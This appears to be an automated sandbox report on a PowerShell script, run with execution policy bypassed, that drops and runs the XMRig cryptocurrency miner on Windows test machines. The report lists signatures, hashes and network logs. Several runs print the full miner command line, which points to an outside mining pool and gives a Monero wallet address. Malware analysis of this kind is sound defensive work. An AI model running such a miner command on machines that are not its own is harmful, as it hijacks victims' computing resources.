GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
FR 142.250.75.234:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 234.75.250.142.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 85.65.42.20.in-addr.arpa udp

Files

memory/3364-0-0x00007FF8A2363000-0x00007FF8A2365000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_icqscv2d.jct.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3364-10-0x000001E9A0D00000-0x000001E9A0D22000-memory.dmp

memory/3364-11-0x00007FF8A2360000-0x00007FF8A2E21000-memory.dmp

memory/3364-12-0x00007FF8A2360000-0x00007FF8A2E21000-memory.dmp

memory/3364-14-0x000001E9BB610000-0x000001E9BB622000-memory.dmp

memory/3364-15-0x000001E9BB600000-0x000001E9BB60A000-memory.dmp

memory/3364-16-0x00007FF8A2363000-0x00007FF8A2365000-memory.dmp

memory/3364-17-0x00007FF8A2360000-0x00007FF8A2E21000-memory.dmp

memory/3364-36-0x00007FF8A2360000-0x00007FF8A2E21000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3608-49-0x0000020D097B0000-0x0000020D097D0000-memory.dmp

memory/3364-50-0x00007FF8A2360000-0x00007FF8A2E21000-memory.dmp

memory/3608-51-0x0000020D09800000-0x0000020D09820000-memory.dmp

memory/3608-52-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

memory/3608-53-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

memory/3608-54-0x0000020D09820000-0x0000020D09840000-memory.dmp

memory/3608-55-0x0000020D9C3E0000-0x0000020D9C400000-memory.dmp

memory/3608-56-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

memory/3608-57-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

memory/3608-60-0x0000020D9C3E0000-0x0000020D9C400000-memory.dmp

memory/3608-59-0x0000020D09820000-0x0000020D09840000-memory.dmp

memory/3608-58-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

memory/3608-61-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

memory/3608-62-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

memory/3608-63-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

memory/3608-64-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

memory/3608-65-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

memory/3608-66-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

memory/3608-67-0x00007FF7C63A0000-0x00007FF7C6FD3000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10v2004-20240508-en

Max time kernel

148s

Max time network

155s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 155.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 28.73.42.20.in-addr.arpa udp

Files

memory/2272-0-0x00007FFA94B33000-0x00007FFA94B35000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pd0iyk5g.yax.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2272-1-0x0000025E9DCE0000-0x0000025E9DD02000-memory.dmp

memory/2272-11-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/2272-12-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/2272-14-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/2272-15-0x0000025E9DE50000-0x0000025E9DE62000-memory.dmp

memory/2272-16-0x0000025E9D390000-0x0000025E9D39A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4068-47-0x00000252DC870000-0x00000252DC890000-memory.dmp

memory/4068-48-0x00000252DE2B0000-0x00000252DE2D0000-memory.dmp

memory/4068-49-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/2272-50-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/2272-52-0x00007FFA94B33000-0x00007FFA94B35000-memory.dmp

memory/4068-51-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/2272-53-0x00007FFA94B30000-0x00007FFA955F1000-memory.dmp

memory/4068-55-0x0000025370EA0000-0x0000025370EC0000-memory.dmp

memory/4068-54-0x00000252DE2D0000-0x00000252DE2F0000-memory.dmp

memory/4068-56-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/4068-57-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/4068-58-0x00000252DE2D0000-0x00000252DE2F0000-memory.dmp

memory/4068-59-0x0000025370EA0000-0x0000025370EC0000-memory.dmp

memory/4068-60-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/4068-61-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/4068-62-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/4068-63-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/4068-64-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/4068-65-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/4068-66-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/4068-67-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

memory/4068-68-0x00007FF7D66D0000-0x00007FF7D7303000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10-20240404-en

Max time kernel

148s

Max time network

136s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 28.73.42.20.in-addr.arpa udp

Files

memory/4092-0-0x00007FFA56F63000-0x00007FFA56F64000-memory.dmp

memory/4092-5-0x00000210F3470000-0x00000210F3492000-memory.dmp

memory/4092-7-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/4092-9-0x00000210F3B00000-0x00000210F3B76000-memory.dmp

memory/4092-10-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hmz401ki.bb0.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4092-25-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/4092-61-0x00000210F34A0000-0x00000210F34AA000-memory.dmp

memory/4092-48-0x00000210F3AA0000-0x00000210F3AB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 6ceda7ef7937d647f4640fdde8f69e68
SHA1 061dc76d2869e4f6af0277cfca3ee1add96c6937
SHA256 c3f59fa575df56481efe50cd65781cadd7dfdecba66aa01c396a89446c619bb2
SHA512 1495eb20a9340505f4f9b232dc2faff53e98c730569e06d239c47cf9646233b7ea0451f94017ce461092b866c7de85c0de41f69a09c0ba06a2420ff00242bb1c

memory/4712-90-0x000001DC0CD10000-0x000001DC0CD30000-memory.dmp

memory/4712-91-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-92-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4092-93-0x00007FFA56F63000-0x00007FFA56F64000-memory.dmp

memory/4092-94-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/4092-95-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/4712-96-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-97-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-98-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-99-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-100-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-101-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-102-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-103-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-104-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-105-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-106-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-107-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win11-20240426-en

Max time kernel

142s

Max time network

145s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/3368-0-0x00007FFA0B7C3000-0x00007FFA0B7C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sy2ccalh.apw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3368-9-0x0000024443020000-0x0000024443042000-memory.dmp

memory/3368-10-0x00007FFA0B7C0000-0x00007FFA0C282000-memory.dmp

memory/3368-11-0x00007FFA0B7C0000-0x00007FFA0C282000-memory.dmp

memory/3368-12-0x00007FFA0B7C0000-0x00007FFA0C282000-memory.dmp

memory/3368-15-0x00000244430A0000-0x00000244430AA000-memory.dmp

memory/3368-14-0x00000244431B0000-0x00000244431C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3924-46-0x000001B83A4F0000-0x000001B83A510000-memory.dmp

memory/3924-47-0x000001B83BCF0000-0x000001B83BD10000-memory.dmp

memory/3924-48-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3368-49-0x00007FFA0B7C0000-0x00007FFA0C282000-memory.dmp

memory/3368-50-0x00007FFA0B7C3000-0x00007FFA0B7C5000-memory.dmp

memory/3924-51-0x000001B83BD10000-0x000001B83BD30000-memory.dmp

memory/3924-53-0x000001B83BD30000-0x000001B83BD50000-memory.dmp

memory/3368-52-0x00007FFA0B7C0000-0x00007FFA0C282000-memory.dmp

memory/3924-54-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3924-55-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3924-57-0x000001B83BD10000-0x000001B83BD30000-memory.dmp

memory/3924-56-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3924-58-0x000001B83BD30000-0x000001B83BD50000-memory.dmp

memory/3924-59-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3924-60-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3924-61-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3924-62-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3924-63-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3924-64-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3924-65-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3924-66-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3924-67-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10v2004-20240426-en

Max time kernel

139s

Max time network

124s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 37.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 96.136.73.23.in-addr.arpa udp

Files

memory/2720-0-0x00007FFCE0913000-0x00007FFCE0915000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z5hnhzz0.3wn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2720-6-0x000001C050FE0000-0x000001C051002000-memory.dmp

memory/2720-11-0x00007FFCE0910000-0x00007FFCE13D1000-memory.dmp

memory/2720-12-0x00007FFCE0910000-0x00007FFCE13D1000-memory.dmp

memory/2720-14-0x00007FFCE0910000-0x00007FFCE13D1000-memory.dmp

memory/2720-16-0x000001C0514A0000-0x000001C0514AA000-memory.dmp

memory/2720-15-0x000001C0514C0000-0x000001C0514D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1424-47-0x0000021CF9930000-0x0000021CF9950000-memory.dmp

memory/1424-48-0x0000021CF9980000-0x0000021CF99A0000-memory.dmp

memory/1424-49-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/1424-52-0x0000021D8C570000-0x0000021D8C590000-memory.dmp

memory/1424-50-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/1424-51-0x0000021D8C550000-0x0000021D8C570000-memory.dmp

memory/2720-53-0x00007FFCE0913000-0x00007FFCE0915000-memory.dmp

memory/2720-54-0x00007FFCE0910000-0x00007FFCE13D1000-memory.dmp

memory/1424-55-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/2720-56-0x00007FFCE0910000-0x00007FFCE13D1000-memory.dmp

memory/1424-57-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/1424-59-0x0000021D8C570000-0x0000021D8C590000-memory.dmp

memory/1424-58-0x0000021D8C550000-0x0000021D8C570000-memory.dmp

memory/1424-60-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/1424-61-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/1424-62-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/1424-63-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/1424-64-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/1424-65-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/1424-66-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

